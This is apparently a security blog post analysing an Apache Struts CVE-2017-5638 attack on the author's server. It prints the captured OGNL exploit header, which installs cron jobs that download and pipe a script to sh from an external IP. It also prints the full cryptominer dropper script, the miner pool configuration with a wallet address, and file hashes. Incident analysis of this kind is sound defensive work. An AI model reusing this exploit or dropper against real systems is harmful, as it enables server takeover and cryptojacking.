One day, we noticed strange GET request towards our JBoss server:
GET /login.action HTTP/1.1
Host: X.X.X.X
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0
Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@org.apache.commons.io[email protected](#process.getInputStream(),#ros)).(#ros.flush())}
From the request above, you’ll quickly noticed that this attack leveraging Apache Struts vulnerability from CVE-2017-5638.
The request tried to execute command below:
#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -'
Some explanations:
“-O” : writes the documents to file.
“-” : if – is used as file, documents will be printed to standard output, disabling link conversion.
“-q” : quiet (no output)
As you see, it tried to fetch a .jpg file from 91.230.47.41. Seems normal right?
Let’s fetch that file & take a look inside it:
[email protected]:~/a# file logo.jpg
logo.jpg: POSIX shell script, ASCII text executable
ASCII?? Not JPG?? hmm..
Lets see what’s inside the “logo.jpg” file:
[email protected]:~/a# cat logo.jpg
#!/bin/sh
rm -rf /tmp/systemd-logind
rm -rf /tmp/logind.conf
rm -rf /tmp/kworker
rm -rf /tmp/kworker.conf
rm -rf /tmp/kauditd.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f qivtpwwuxs
ps auxf|grep -v grep|grep -v smzgmilpdo|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qivtpwwuxs"|awk '{print $2}'|xargs kill -9
ps -fe|grep smzgmilpdo|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/smzgmilpdo.conf
rm -rf /tmp/smzgmilpdo.conf
curl -o /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
wget -O /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/pics/kworker
wget -O /tmp/kauditd http://91.230.47.41/pics/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/pics/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/pics/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./kauditd -c smzgmilpdo.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi
We noticed there are several other file fetched; possibly a config file & bin file.
Let’s fetch those file!
Here is the config file:
http://91.230.47.41/pics/kworker.conf
{{
"url" : "stratum+tcp://212.129.44.157:80",
"url" : "stratum+tcp://212.129.46.87:80",
"url" : "stratum+tcp://212.129.44.156:80",
"url" : "stratum+tcp://212.129.46.191:80",
"url" : "stratum+tcp://62.210.29.108:80",
"url" : "stratum+tcp://212.83.129.195:80",
"url" : "stratum+tcp://212.129.44.155:80",
"user" : "466iRjZzJZZWAqzV24ywY8XMVNkp9hj8UJiBEf61Eui6Nw8bEAJ1z434LWM3SKdaDyH7zgNY64rgg2fYmw8cbP5uBjpMA8g",
"pass" : "x",
"algo" : "cryptonight",
"quiet" : true
}
Not sure it is. Maybe some sort of config file for cryptomining. Lets analyze the other 2 files.
First file: http://91.230.47.41/pics/kworker
[email protected]:~/91.230.47.41# file kworker
kworker: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
hmm.. an executable Linux file..
Lets see if the file is packed:
[email protected]:~/91.230.47.41# upx -l kworker
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
2979640 -> 1217152 40.85% linux/ElfAMD kworker
Yup. so lets unpacked the file using UPX:
[email protected]:~/91.230.47.41# upx -d kworker
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
2980813 <- 1217152 40.83% linux/ElfAMD kworker
Unpacked 1 file.
[email protected]:~/91.230.47.41# upx -l kworker
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: kworker1: NotPackedException: not packed by UPX
Another file: http://91.230.47.41/pics/kworker_na
[email protected]:~/91.230.47.41# file kworker_na
kworker_na: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=0x0eedc33c49aeb80818a839a9b23cf159c710e443, stripped
[email protected]:~/91.230.47.41# upx -l kworker_na
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: kworker_na: NotPackedException: not packed by UPX
Overall, looks like the attacker want to hack our servers & turn it into his own crypto currency mining machine.
Typical behavior of attack we see in this time where the crypto currency is rising. People hack to make profit. ๐
Here the MD5 for file above:
211e98ac0686fe98d06570ad0689e9b3 logo.jpg
d2a01b844521fb141b8449f4d8e1c821 kworker.conf
483b322b42835227d98f523f9df5c6fc kworker (upx packed)
4fa4269b7ce44bfce5ef574e6a37c38f kworker (upx unpacked)
131df88b7d0b3e7a1c4d84c37e71fb60 kworker_na
Like this:
Like Loading...